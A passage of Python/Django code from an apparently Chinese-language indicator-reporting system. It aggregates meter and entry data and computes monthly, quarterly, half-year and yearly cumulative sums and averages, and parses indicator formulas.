targetvalue[0].cumulativequarter,\n \"cumulativehalfyear\": targetvalue[0].cumulativehalfyear,\n \"cumulativeyear\": targetvalue[0].cumulativeyear,\n \"releasestate\": targetvalue[0].releasestate}\n elif target.operationtype == \"1\":\n targetvalue = getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target=target, datadate=reporting_date)\n if len(targetvalue) > 0:\n curtargetdata = {\"target\": target, \"zerodata\": 
targetvalue[0].zerodata,\n \"twentyfourdata\": targetvalue[0].twentyfourdata,\n \"metervalue\": targetvalue[0].metervalue, \"todayvalue\": targetvalue[0].todayvalue,\n \"judgevalue\": targetvalue[0].judgevalue,\n \"curvalue\": targetvalue[0].curvalue,\n \"curvaluedate\": targetvalue[0].curvaluedate,\n \"curvaluetext\": targetvalue[0].curvaluetext,\n \"cumulativemonth\": targetvalue[0].cumulativemonth,\n \"cumulativequarter\": targetvalue[0].cumulativequarter,\n \"cumulativehalfyear\": targetvalue[0].cumulativehalfyear,\n \"cumulativeyear\": targetvalue[0].cumulativeyear,\n \"releasestate\": targetvalue[0].releasestate}\n all_data.append(curtargetdata)\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n\n for data in all_data:\n businesstypename = data[\"target\"].businesstype\n\n try:\n if businesstypename:\n for dict in all_dict_list:\n if businesstypename == str(dict['id']):\n businesstypename = dict['name']\n break\n except:\n pass\n unitname = data[\"target\"].unit\n try:\n if unitname:\n for dict in all_dict_list:\n if unitname == str(dict['id']):\n unitname = dict['name']\n break\n except:\n pass\n cumulativemonth = \"\"\n cumulativequarter = \"\"\n cumulativehalfyear = \"\"\n cumulativeyear = \"\"\n curvalue = \"\"\n todayvalue = \"\"\n judgevalue = \"\"\n\n if data[\"target\"].datatype == \"numbervalue\":\n todayvalue = data[\"todayvalue\"]\n try:\n todayvalue = round(data[\"todayvalue\"], data[\"target\"].digit)\n except:\n pass\n judgevalue = data[\"judgevalue\"]\n try:\n judgevalue = round(data[\"judgevalue\"], data[\"target\"].digit)\n except:\n pass\n curvalue = data[\"curvalue\"]\n try:\n curvalue = round(data[\"curvalue\"], data[\"target\"].digit)\n except:\n pass\n elif data[\"target\"].datatype == \"date\":\n curvalue = \"\"\n try:\n curvalue = data[\"curvaluedate\"].strftime('%Y-%m-%d %H:%M:%S') if data[\"curvaluedate\"] else \"\"\n except:\n pass\n elif data[\"target\"].datatype == \"text\":\n curvalue = data[\"curvaluetext\"]\n if data[\"target\"].cumulative in ['1', '2', '3', '4', '5']:\n try:\n cumulativemonth = round(data[\"cumulativemonth\"], data[\"target\"].digit)\n except:\n pass\n try:\n cumulativequarter = round(data[\"cumulativequarter\"], data[\"target\"].digit)\n except:\n pass\n try:\n cumulativehalfyear = round(data[\"cumulativehalfyear\"], data[\"target\"].digit)\n except:\n pass\n try:\n cumulativeyear = round(data[\"cumulativeyear\"], data[\"target\"].digit)\n except:\n pass\n result.append({\n \"todayvalue\": todayvalue,\n \"judgevalue\": judgevalue,\n \"curvalue\": curvalue,\n \"cumulativemonth\": cumulativemonth,\n \"cumulativequarter\": cumulativequarter,\n \"cumulativehalfyear\": cumulativehalfyear,\n \"cumulativeyear\": cumulativeyear,\n \"target_id\": data[\"target\"].id,\n \"target_name\": data[\"target\"].name,\n \"target_unity\": data[\"target\"].unity,\n \"target_code\": data[\"target\"].code,\n \"target_businesstype\": data[\"target\"].businesstype,\n \"target_unit\": data[\"target\"].unit,\n \"target_businesstypename\": businesstypename,\n \"target_unitname\": unitname,\n \"target_datatype\": data[\"target\"].datatype,\n \"target_cumulative\": data[\"target\"].cumulative,\n \"target_magnification\": data[\"target\"].magnification,\n \"target_upperlimit\": data[\"target\"].upperlimit,\n \"target_lowerlimit\": data[\"target\"].lowerlimit,\n\n \"zerodata\": data[\"zerodata\"],\n \"twentyfourdata\": data[\"twentyfourdata\"],\n \"metervalue\": data[\"metervalue\"],\n \"releasestate\": data[\"releasestate\"]\n })\n 
return JsonResponse({\"data\": result})\n\n\ndef getcumulative(tableList, target, date, value):\n \"\"\"\n 数据累计\n 求和\n 算术平均\n 加权平均\n 非零算数平均\n 求和(上月)(环保专用)\n \"\"\"\n cumulativemonth = value\n cumulativequarter = value\n cumulativehalfyear = value\n cumulativeyear = value\n\n def get_last_cumulative_data(tableList, tmp_target, tmp_date):\n \"\"\"\n 找到指标指点时间点的月累计值、季累计值、半年累计值、年累计值\n :param tableList:\n :param tmp_target:\n :param tmp_date:\n :return:\n \"\"\"\n lastcumulativemonth = 0\n lastcumulativequarter = 0\n lastcumulativehalfyear = 0\n lastcumulativeyear = 0\n\n lastg_date = datetime.datetime.strptime('2000-01-01', \"%Y-%m-%d\")\n # 周期类型 =>\n # 昨日\n # 上个月末\n # 上个季度末\n # 上个半年末\n # 上个年末\n if tmp_target.cycletype == \"10\":\n lastg_date = tmp_date + datetime.timedelta(days=-1)\n if tmp_target.cycletype == \"11\":\n lastg_date = tmp_date.replace(day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)\n if tmp_target.cycletype == \"12\":\n month = (tmp_date.month - 1) - (tmp_date.month - 1) % 3 + 1 # 10\n newdate = datetime.datetime(tmp_date.year, month, 1)\n lastg_date = newdate + datetime.timedelta(days=-1)\n if tmp_target.cycletype == \"13\":\n month = (tmp_date.month - 1) - (tmp_date.month - 1) % 6 + 1 # 10\n newdate = datetime.datetime(tmp_date.year, month, 1)\n lastg_date = newdate + datetime.timedelta(days=-1)\n if tmp_target.cycletype == \"14\":\n lastg_date = tmp_date.replace(\n month=1, day=1, hour=0, minute=0, second=0, microsecond=0\n ) + datetime.timedelta(days=-1)\n\n queryset = tableList[\"Entrydata\"].objects\n operationtype = tmp_target.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n\n all_data = queryset.exclude(state=\"9\").filter(target=tmp_target, datadate=lastg_date)\n if len(all_data) > 0:\n try:\n if lastg_date.year == tmp_date.year and lastg_date.month == tmp_date.month:\n lastcumulativemonth += all_data[0].cumulativemonth\n except:\n pass\n try:\n if lastg_date.year == tmp_date.year and (lastg_date.month - 1) - (lastg_date.month - 1) % 3 == (\n tmp_date.month - 1) - (tmp_date.month - 1) % 3:\n lastcumulativequarter += all_data[0].cumulativequarter\n except:\n pass\n try:\n if lastg_date.year == tmp_date.year and (lastg_date.month - 1) - (lastg_date.month - 1) % 6 == (\n tmp_date.month - 1) - (tmp_date.month - 1) % 6:\n lastcumulativehalfyear += all_data[0].cumulativehalfyear\n except:\n pass\n try:\n if lastg_date.year == tmp_date.year:\n lastcumulativeyear += all_data[0].cumulativeyear\n except:\n pass\n\n return lastcumulativemonth, lastcumulativequarter, lastcumulativehalfyear, lastcumulativeyear\n\n lastcumulativemonth, lastcumulativequarter, lastcumulativehalfyear, lastcumulativeyear \\\n = get_last_cumulative_data(tableList, target, date)\n\n def get_lm_last_cumulative_data(tmp_target, tmp_date):\n \"\"\"\n 获取累计类型为求和(上月)(环保专用)指标的累计时间推迟一个月\n \"\"\"\n lm_lastcumulativemonth = 0\n lm_lastcumulativequarter = 0\n lm_lastcumulativehalfyear = 0\n lm_lastcumulativeyear = 0\n\n lastg_date = datetime.datetime.strptime('2000-01-01', \"%Y-%m-%d\")\n if tmp_target.cycletype == \"11\":\n lastg_date = tmp_date.replace(day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)\n queryset = tableList[\"Entrydata\"].objects\n operationtype = 
tmp_target.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n\n # 上月份为12月,取去年表数据\n if lastg_date.month == 12:\n lm_tableyear = str(lastg_date.year)\n lm_tableList = {\n \"Entrydata\": getmodels(\"Entrydata\", lm_tableyear),\n \"Meterdata\": getmodels(\"Meterdata\", lm_tableyear),\n \"Extractdata\": getmodels(\"Extractdata\", lm_tableyear),\n \"Calculatedata\": getmodels(\"Calculatedata\", lm_tableyear)\n }\n queryset = tableList[\"Entrydata\"].objects\n operationtype = tmp_target.operationtype\n if operationtype == \"1\":\n queryset = lm_tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = lm_tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = lm_tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = lm_tableList[\"Calculatedata\"].objects\n all_data = queryset.exclude(state=\"9\").filter(target=tmp_target, datadate=lastg_date)\n else:\n all_data = queryset.exclude(state=\"9\").filter(target=tmp_target, datadate=lastg_date)\n\n if len(all_data) > 0:\n try:\n if tmp_date.month in [1, 3, 4, 6, 7, 9, 10, 12]:\n lm_lastcumulativequarter += all_data[0].cumulativequarter\n except:\n pass\n try:\n if tmp_date.month in [1, 3, 4, 5, 6, 7, 9, 10, 11, 12]:\n lm_lastcumulativehalfyear += all_data[0].cumulativehalfyear\n except:\n pass\n try:\n if tmp_date.month != 2:\n lm_lastcumulativeyear += all_data[0].cumulativeyear\n except:\n pass\n else:\n pass\n return lm_lastcumulativemonth, lm_lastcumulativequarter, lm_lastcumulativehalfyear, lm_lastcumulativeyear\n\n lm_lastcumulativemonth, lm_lastcumulativequarter, lm_lastcumulativehalfyear, lm_lastcumulativeyear \\\n = get_lm_last_cumulative_data(target, date)\n\n def get_sum_cumulative_data(tableList, tmp_target, tmp_start_date, tmp_date):\n \"\"\"\n 算数平均\n 求和:指标在此时间范围\n \"\"\"\n last_sum_data = 0\n lastg_date = tmp_date + datetime.timedelta(days=-1)\n queryset = tableList[\"Entrydata\"].objects\n operationtype = tmp_target.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n\n # 根据时间范围, 查出所有数据求和\n range_date = (tmp_start_date, lastg_date)\n all_data = queryset.exclude(state=\"9\").filter(datadate__range=range_date).filter(target=tmp_target)\n if len(all_data) > 0:\n try:\n last_sum_data = all_data.aggregate(Sum('curvalue'))[\"curvalue__sum\"]\n except:\n pass\n return last_sum_data\n\n def get_sum_cumulative_exclude_zero(tableList, tmp_target, tmp_start_date, tmp_date):\n \"\"\"\n 非零算数平均\n 求和:指标在此时间范围(去除0)\n \"\"\"\n last_sum_data = 0\n day_count = 0\n\n lastg_date = tmp_date + datetime.timedelta(days=-1)\n\n queryset = tableList[\"Entrydata\"].objects\n operationtype = tmp_target.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n\n # 根据时间范围, 查出所有数据求和(去除0)\n range_date = 
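Aside: the queryset-selection chain (operationtype '1'/'15'/'16'/'17' mapped to Meterdata/Entrydata/Extractdata/Calculatedata) appears four times in getcumulative alone. A sketch of the same dispatch as one mapping, keyed the way tableList is keyed above:

OPERATION_TABLE = {
    "1": "Meterdata",       # meter readings
    "15": "Entrydata",      # manual entry
    "16": "Extractdata",    # extracted data
    "17": "Calculatedata",  # computed data
}

def table_for(table_list, operationtype):
    # Falls back to Entrydata, matching the default above.
    return table_list[OPERATION_TABLE.get(operationtype, "Entrydata")]

# demo with stand-in values in place of the year-sharded model classes
tables = {name: name for name in OPERATION_TABLE.values()}
print(table_for(tables, "16"))  # -> Extractdata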
(tmp_start_date, lastg_date)\n all_data = queryset.exclude(state=\"9\").filter(datadate__range=range_date).filter(target=tmp_target).exclude(curvalue='0')\n if len(all_data) > 0:\n try:\n last_sum_data = all_data.aggregate(Sum('curvalue'))[\"curvalue__sum\"]\n day_count = int(len(all_data))\n except:\n pass\n return last_sum_data, day_count\n\n cumulative = target.cumulative\n weight_target = target.weight_target\n\n if cumulative == '1': # 求和\n cumulativemonth = lastcumulativemonth + value\n cumulativequarter = lastcumulativequarter + value\n cumulativehalfyear = lastcumulativehalfyear + value\n cumulativeyear = lastcumulativeyear + value\n\n if cumulative == '5': # 求和(上月)(环保专用)\n cumulativemonth = lm_lastcumulativemonth + value\n cumulativequarter = lm_lastcumulativequarter + value\n cumulativehalfyear = lm_lastcumulativehalfyear + value\n cumulativeyear = lm_lastcumulativeyear + value\n\n if cumulative == '2': # 算术平均,保留位数\n if target.cycletype == \"10\":\n # 日报\n yestoday_date = date + datetime.timedelta(days=-1)\n if date.year == yestoday_date.year:\n # 当月昨天天数、当季到昨天的天数、半年到昨天的天数、当年到昨天的天数\n def get_days(start_time, end_time):\n return int(\n (end_time.replace(hour=0, minute=0, second=0, microsecond=0) - start_time.replace(\n day=1, hour=0, minute=0, second=0, microsecond=0\n )).total_seconds() / (60 * 60 * 24)\n ) + 1\n\n # 1.月累计\n ms_date = date.replace(day=1)\n last_sum_data = get_sum_cumulative_data(tableList, target, ms_date, date)\n # 判断是否是当月的第一天,当月第一天等于当前值\n if date.day == 1:\n cumulativemonth = value\n else:\n cumulativemonth = (last_sum_data + value) / date.day\n\n # 2.季累计\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_date = datetime.datetime(date.year, month, 1)\n days_in_quarter = get_days(ss_date, yestoday_date)\n last_sum_data = get_sum_cumulative_data(tableList, target, ss_date, date)\n # 判断是否是当季的第一天,当季第一天等于当前值\n if date.day == 1 and date.month in (1, 4, 7, 10):\n cumulativequarter = value\n else:\n cumulativequarter = (last_sum_data + value) / (days_in_quarter + 1)\n\n # 3.半年累计\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n days_in_halfyear = get_days(hs_date, yestoday_date)\n last_sum_data = get_sum_cumulative_data(tableList, target, hs_date, date)\n # 判断是否是半年的第一天,半年第一天等于当前值\n if date.day == 1 and date.month in (1, 7):\n cumulativehalfyear = value\n else:\n cumulativehalfyear = (last_sum_data + value) / (days_in_halfyear + 1)\n\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n days_in_year = get_days(ys_date, yestoday_date)\n last_sum_data = get_sum_cumulative_data(tableList, target, ys_date, date)\n cumulativeyear = (last_sum_data + value) / (days_in_year + 1)\n else:\n pass\n if target.cycletype == \"11\":\n # 月报\n if date.month > 1:\n # 2.季累计\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_date = datetime.datetime(date.year, month, 1)\n last_sum_data = get_sum_cumulative_data(tableList, target, ss_date, date)\n # 判断是否是当季的第一天,当季第一天等于当前值\n if date.day == 1 and date.month in (4, 7, 10):\n cumulativequarter = value\n else:\n cumulativequarter = (last_sum_data + value) / (date.month-ss_date.month+1)\n\n # 3.半年累计\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n last_sum_data = get_sum_cumulative_data(tableList, target, hs_date, date)\n # 判断是否是半年的第一天,半年第一天等于当前值\n if date.day == 1 and date.month == 7:\n cumulativehalfyear = value\n else:\n cumulativehalfyear = (last_sum_data + value) / (date.month-hs_date.month+1)\n\n # 4.年累计\n ys_date 
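= date.replace(month=1, day=1)\n                # Arithmetic mean over the months elapsed this year: (sum of previous\n                # months + this month's value) / number of months including this one.\n                ys_date 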
= date.replace(month=1, day=1)\n last_sum_data = get_sum_cumulative_data(tableList, target, ys_date, date)\n cumulativeyear = (last_sum_data + value) / (date.month - ys_date.month + 1)\n else:\n pass\n if target.cycletype == \"12\":\n # 季报\n if date.month > 3:\n # 3.半年上个月所在月份(区分前/后半年)\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n last_sum_data = get_sum_cumulative_data(tableList, target, hs_date, date)\n # 判断是否是半年的第一天,半年第一天等于当前值\n if date.month == 9:\n day = 1\n elif date.month == 6 or date.month == 12:\n day = 2\n cumulativehalfyear = (last_sum_data + value) / day\n\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data = get_sum_cumulative_data(tableList, target, ys_date, date)\n if date.month == 6:\n day = 2\n elif date.month == 9:\n day = 3\n elif date.month == 12:\n day = 4\n cumulativeyear = (last_sum_data + value) / day\n\n if target.cycletype == \"13\":\n if date.month > 6:\n # 半年报\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data = get_sum_cumulative_data(tableList, target, ys_date, date)\n cumulativeyear = (last_sum_data + value) / 2\n if target.cycletype == \"14\":\n # 年报均为当前值\n pass\n if cumulative == '3': # 加权平均\n if not weight_target:\n raise Exception('未配置加权指标。')\n # 加权指标当前值\n wt_value = 0\n try:\n wt_target_id = target.weight_target_id\n queryset = tableList[\"Entrydata\"].objects\n operationtype = target.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n\n wt_calculatedata = queryset.exclude(state=\"9\").filter(datadate=date).filter(target_id=wt_target_id)[0]\n wt_value = wt_calculatedata.curvalue\n except Exception as e:\n print(e)\n\n wt_lastcumulativemonth, wt_lastcumulativequarter, wt_lastcumulativehalfyear, wt_lastcumulativeyear \\\n = get_last_cumulative_data(tableList, weight_target, date)\n if target.cycletype == \"10\":\n # 日报:\n yestoday_date = date + datetime.timedelta(days=-1)\n if date.year == yestoday_date.year:\n if date.day > 1: # 日报月初月累计为当前值\n cumulativemonth = (lastcumulativemonth * wt_lastcumulativemonth + value * wt_value) / (\n wt_lastcumulativemonth + wt_value\n )\n if not (date.month % 3 == 1 and date.day == 1): # 判断是否所在季度第一天\n cumulativequarter = (lastcumulativequarter * wt_lastcumulativequarter + value * wt_value) / (\n wt_lastcumulativequarter + wt_value\n )\n if not (date.month % 3 == 1 and date.day == 1): # 判断是否所在季度第一天\n cumulativehalfyear = (lastcumulativehalfyear * wt_lastcumulativehalfyear + value * wt_value) / (\n wt_lastcumulativehalfyear + wt_value\n )\n cumulativeyear = (cumulativeyear * lastcumulativeyear + value * wt_value) / (\n wt_lastcumulativeyear + wt_value\n )\n if target.cycletype == \"11\":\n # 月报\n if date.month > 1:\n last_month_date = date.replace(day=1, hour=0, minute=0, second=0, microsecond=0) + \\\n datetime.timedelta(days=-1)\n if date.month > 3: # 不是第一个季度\n last_month_on_quarter = last_month_date.month % 3\n else:\n last_month_on_quarter = last_month_date.month\n if last_month_on_quarter > 0: # 任何一季度首月季累计为当前值\n cumulativequarter = (lastcumulativequarter * wt_lastcumulativequarter + value * wt_value) / (\n wt_lastcumulativequarter + wt_value\n )\n if date.month != 7: # 不是半年第一月\n cumulativehalfyear = (lastcumulativehalfyear * wt_lastcumulativehalfyear + value * 
wt_value) / (\n wt_lastcumulativehalfyear + wt_value\n )\n cumulativeyear = (lastcumulativeyear + wt_lastcumulativeyear + value * wt_value) / (\n wt_lastcumulativeyear + wt_value\n )\n if target.cycletype == \"12\":\n # 季报\n if date.month > 3: # 非第一季度\n cumulativequarter = (lastcumulativequarter * wt_lastcumulativequarter + value * wt_value) / (\n wt_lastcumulativequarter + wt_value\n )\n if date.month in [4, 5, 6, 10, 11, 12]: # 半年后季\n cumulativehalfyear = (lastcumulativehalfyear * wt_lastcumulativehalfyear + value * wt_value) / (\n wt_lastcumulativehalfyear + wt_value\n )\n cumulativeyear = (lastcumulativeyear * wt_lastcumulativeyear + value * wt_value) / (\n wt_lastcumulativeyear + wt_value\n )\n if target.cycletype == \"13\":\n if date.month > 6:\n cumulativeyear = (lastcumulativeyear * wt_lastcumulativeyear + value * wt_value) / (\n wt_lastcumulativeyear + wt_value\n )\n if target.cycletype == \"14\":\n pass\n if cumulative == '4': # 非零算术平均\n if target.cycletype == \"10\":\n # 日报\n yestoday_date = date + datetime.timedelta(days=-1)\n if date.year == yestoday_date.year:\n # 1.月累计\n ms_date = date.replace(day=1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ms_date, date)\n # 判断是否是当月的第一天,当月第一天等于当前值\n if date.day == 1:\n cumulativemonth = value\n else:\n if value == 0:\n if day_count != 0:\n cumulativemonth = (last_sum_data + value) / day_count\n else:\n cumulativemonth = value\n else:\n cumulativemonth = (last_sum_data + value) / (day_count+1)\n\n # 2.季累计\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_date = datetime.datetime(date.year, month, 1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ss_date, date)\n # 判断是否是当季的第一天,当季第一天等于当前值\n if date.day == 1 and date.month in (1, 4, 7, 10):\n cumulativequarter = value\n else:\n if value == 0:\n if day_count != 0:\n cumulativequarter = (last_sum_data + value) / day_count\n else:\n cumulativequarter = value\n else:\n cumulativequarter = (last_sum_data + value) / (day_count+1)\n\n # 3.半年累计\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, hs_date, date)\n # 判断是否是半年的第一天,半年第一天等于当前值\n if date.day == 1 and date.month in (1, 7):\n cumulativehalfyear = value\n else:\n if value == 0:\n if day_count != 0:\n cumulativehalfyear = (last_sum_data + value) / day_count\n else:\n cumulativehalfyear = value\n else:\n cumulativehalfyear = (last_sum_data + value) / (day_count+1)\n\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ys_date, date)\n if value == 0:\n if day_count != 0:\n cumulativeyear = (last_sum_data + value) / day_count\n else:\n cumulativeyear = value\n else:\n cumulativeyear = (last_sum_data + value) / (day_count+1)\n else:\n pass\n if target.cycletype == \"11\":\n # 月报\n if date.month > 1:\n # 2.季累计\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_date = datetime.datetime(date.year, month, 1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ss_date, date)\n # 判断是否是当季的第一天,当季第一天等于当前值\n if date.day == 1 and date.month in (4, 7, 10):\n cumulativequarter = value\n else:\n if value == 0:\n if day_count != 0:\n cumulativequarter = (last_sum_data + value) / day_count\n else:\n cumulativequarter = value\n else:\n cumulativequarter = (last_sum_data + value) / (day_count + 1)\n\n # 3.半年累计\n month = (date.month - 1) - 
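(date.month - 1) % 6 + 1\n                # (m - 1) - (m - 1) % k + 1 rounds month m down to the first month of\n                # its k-month period: k=3 gives the quarter start, k=6 the half-year\n                # start (e.g. month 8 with k=6 -> 7, i.e. July).\n                month = (date.month - 1) - 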
(date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, hs_date, date)\n # 判断是否是半年的第一天,半年第一天等于当前值\n if date.day == 1 and date.month == 7:\n cumulativehalfyear = value\n else:\n if value == 0:\n if day_count != 0:\n cumulativehalfyear = (last_sum_data + value) / day_count\n else:\n cumulativehalfyear = value\n else:\n cumulativehalfyear = (last_sum_data + value) / (day_count + 1)\n\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ys_date, date)\n if value == 0:\n if day_count != 0:\n cumulativeyear = (last_sum_data + value) / day_count\n else:\n cumulativeyear = value\n else:\n cumulativeyear = (last_sum_data + value) / (day_count + 1)\n else:\n pass\n if target.cycletype == \"12\":\n # 季报\n if date.month > 3:\n # 3.半年累计\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, hs_date, date)\n if value == 0:\n if day_count != 0:\n cumulativehalfyear = (last_sum_data + value) / day_count\n else:\n cumulativehalfyear = value\n else:\n cumulativehalfyear = (last_sum_data + value) / (day_count+1)\n\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ys_date, date)\n if value == 0:\n if day_count != 0:\n cumulativeyear = (last_sum_data + value) / day_count\n else:\n cumulativeyear = value\n else:\n cumulativeyear = (last_sum_data + value) / (day_count+1)\n\n if target.cycletype == \"13\":\n # 半年报\n if date.month > 6:\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ys_date, date)\n if value == 0:\n if day_count != 0:\n cumulativeyear = (last_sum_data + value) / day_count\n else:\n cumulativeyear = value\n else:\n cumulativeyear = (last_sum_data + value) / (day_count+1)\n if target.cycletype == \"14\":\n # 年报均为当前值\n pass\n\n try:\n cumulativemonth = round(cumulativemonth, target.digit)\n except:\n pass\n try:\n cumulativequarter = round(cumulativequarter, target.digit)\n except:\n pass\n try:\n cumulativehalfyear = round(cumulativehalfyear, target.digit)\n except:\n pass\n try:\n cumulativeyear = round(cumulativeyear, target.digit)\n except:\n pass\n return {\"cumulativemonth\": cumulativemonth, \"cumulativequarter\": cumulativequarter,\n \"cumulativehalfyear\": cumulativehalfyear, \"cumulativeyear\": cumulativeyear}\n\n\ndef getcalculatedata(target, date, guid, all_constant, all_target, tableList, forward=True):\n \"\"\"\n 数据计算\n @forward {bool}: 是否往前计算\n \"\"\"\n todayvalue = -9999\n if target.data_from == 'et':\n # 外部系统,直接取数\n # 从数据库中获取,取第一个值,其他情况抛错\n ret = Extract.getDataFromSource(target, date)\n if ret['result']:\n try:\n todayvalue = float(ret['result'][0][0])\n except Exception as e:\n print(e)\n else:\n pass\n else:\n formula = \"\"\n\n # 本地系统根据公式计算\n if target.formula is not None:\n formula = target.formula\n\n # 从公式中提取指标与d:D\n members = formula.split('>')\n for member in members:\n if member.replace(\" \", \"\") != \"\":\n col = \"d\"\n cond = \"D\"\n if (member.find('<') >= 0):\n membertarget = member[member.find('<') + 1:].replace(\" \", \"\")\n th = membertarget\n if membertarget.find(':') > 0:\n col = membertarget[membertarget.find(':') + 1:]\n membertarget = membertarget[0:membertarget.find(':')]\n if col.find(':') > 
0:\n cond = col[col.find(':') + 1:]\n col = col[0:col.find(':')]\n\n # 查询常数库value值\n # 公式中取常数值,不存在则取指标值\n value = \"\"\n isconstant = False\n for constant in all_constant:\n if membertarget == constant['code']:\n value = constant['value']\n isconstant = True\n break\n if not isconstant:\n istarget = False\n newtarget = None\n for new_target in all_target:\n if membertarget == new_target.code:\n istarget = True\n newtarget = new_target\n break\n if not istarget or newtarget is None:\n formula = \"-9999\"\n break\n else:\n # 同一应用,同一周期,同一业务,计算操作类型,guid不同(未计算过)的指标,先计算\n # 即:当前指标由另一个公式中其他指标计算所得,'其他'指标值未计算出结果,先计算\n # A = B + 1 B未计算出,先计算出B\n membertarget = newtarget\n # 指标为加权指标先计算\n cumulative = membertarget.cumulative\n\n if forward:\n if cumulative == '3':\n wt_membertarget = membertarget.weight_target\n getcalculatedata(wt_membertarget, date, guid, all_constant, all_target, tableList)\n\n if membertarget.operationtype == target.operationtype and membertarget.adminapp_id == target.adminapp_id \\\n and membertarget.cycletype == target.cycletype and membertarget.work_id == target.work_id \\\n and membertarget.calculateguid != guid and not (cond.startswith('L') or cond.startswith('S')): # 判断指标公式非当前周期的数据:\n getcalculatedata(membertarget, date, guid, all_constant, all_target, tableList)\n\n # 取当年表\n queryset = tableList[\"Entrydata\"].objects\n operationtype = membertarget.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n # 取去年表\n if cond == \"LYS\" or cond == \"LYE\" or (\n (cond == \"LSS\" or cond == \"LSE\") and int(date.month) < 4) or (\n (cond == \"LHS\" or cond == \"LHE\") and int(date.month) < 7) or (\n (cond == \"LMS\" or cond == \"LME\" or cond == \"SLME\" or cond == \"ELME\") and int(date.month) < 2):\n tableyear = str(int(date.year) - 1)\n\n if operationtype == \"1\":\n queryset = getmodels(\"Meterdata\", tableyear).objects\n if operationtype == \"15\":\n queryset = getmodels(\"Entrydata\", tableyear).objects\n if operationtype == \"16\":\n queryset = getmodels(\"Extractdata\", tableyear).objects\n if operationtype == \"17\":\n queryset = getmodels(\"Calculatedata\", tableyear).objects\n\n # 过滤时间\n condtions = {'datadate': date}\n if cond == \"D\":\n condtions = {'datadate': date}\n if cond == \"M\":\n condtions = {'datadate__year': date.year, 'datadate__month': date.month}\n if cond == \"Y\":\n condtions = {'datadate__year': date.year}\n if cond == \"L\": # 前一天\n newdate = date + datetime.timedelta(days=-1)\n condtions = {'datadate': newdate}\n if cond == \"N\": # 后一天\n newdate = date + datetime.timedelta(days=1)\n condtions = {'datadate': newdate}\n\n if cond == \"MS\":\n newdate = date.replace(day=1)\n condtions = {'datadate': newdate}\n if cond == \"ME\":\n year = date.year\n month = date.month\n a, b = calendar.monthrange(year, month) # a,b——weekday的第一天是星期几(0-6对应星期一到星期天)和这个月的所有天数\n newdate = datetime.datetime(year=year, month=month, day=b) # 构造本月月末datetime\n condtions = {'datadate': newdate}\n\n # 上月末,当月为1月,则数据为0\n if cond == \"LME\":\n date_now = date.replace(day=1)\n newdate = date_now + datetime.timedelta(days=-1)\n condtions = 